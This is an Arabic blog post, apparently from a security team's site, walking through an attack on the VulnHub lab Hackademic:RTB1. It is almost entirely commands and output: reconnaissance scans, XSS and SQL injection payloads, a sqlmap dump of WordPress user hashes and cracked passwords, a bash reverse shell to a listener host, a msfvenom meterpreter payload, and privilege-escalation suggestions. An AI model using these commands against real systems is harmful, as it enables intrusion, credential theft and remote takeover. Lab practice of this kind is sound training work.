AES-TEAM

فريق وطني مشترك مختص بمجال الأمن السبراني والاستجابة للحوادث السبرانية وحماية البنية التحتية للانترنت ونشر الوعي في مجال حماية الخصوصية والحماية الذاتية للافراد والمؤسسات على الانترنت

آخر الأخبار

جاري التحميل ...

اختبار اختراق سيرفر لينكس والوصول لصلاحيات الروتVulnHub - Hackademic:RTB1


 

تحميل اللاب المستخدم في الشرح

 





recon

nmap -sV -sU -p- -v -A 192.168.1.2

whatweb -v 192.168.1.2

wpscan --url http://192.168.1.2 -e p,t,tt,u,m

dirb http://192.168.1.2/Hackademic_RTB1

dirb http://192.168.1.2

vulnerability

xss 

url ⇒

PAYLOADS =
{
‘Payloads’:'</p><script>alert(1);</script><p>',
‘Payloads’:'</p><script>alert(1);</script><p>'
}

sql

URL ⇒

PAYLOADS ={

Payload

’:'1 AND 1=1 ',

Payload

’:'"Sleep(2)',
}

 


explit

 

sqlmap -u 192.168.1.2/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump

 






UserName Has Password

NickJames21232f297a57a5a743894a0e4a801fc3admin

JohnSmithb986448f0bb9e5e124ca91d3d650f52cPUPPIES

GeorgeMiller7cbb3252ba6b7e9c422fac5334d22054q1w2e3

TonyBlacka6e514f9486b83cb53d8d932f9a04292napoleon

JasonKonnors8601f6e1028a8e8a966f6c33fcd9aec4maxwell

MaxBucky50484c19f1afdaf3841a0d821ed393d2kernel


 

nc -lvp 5555

Payload = system('bash -i >& /dev/tcp/192.168.1.14/5555 0>&1');

 msfvenom  -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.14 LPORT=9090 -f elf -o shell.bin

use post/multi/recon/local_exploit_suggester


[+] 192.168.1.2 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 192.168.1.2 - exploit/linux/local/libuser_roothelper_priv_esc: The service is running, but could not be validated.
[+] 192.168.1.2 - exploit/linux/local/pkexec: The target appears to be vulnerable.
[+] 192.168.1.2 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated.
[+] 192.168.1.2 - exploit/linux/local/rds_rds_page_copy_user_priv_esc: The target appears to be vulnerable.
[+] 192.168.1.2 - exploit/linux/local/su_login: The target appears to be vulnerable

 


 

عن الكاتب

peace-loving

التعليقات


اتصل بنا

إذا أعجبك محتوى مدونتنا نتمنى البقاء على تواصل دائم ، فقط قم بإدخال بريدك الإلكتروني للإشتراك في بريد المدونة السريع ليصلك جديد المدونة أولاً بأول ، كما يمكنك إرسال رساله بالضغط على الزر المجاور ...

جميع الحقوق محفوظة

AES-TEAM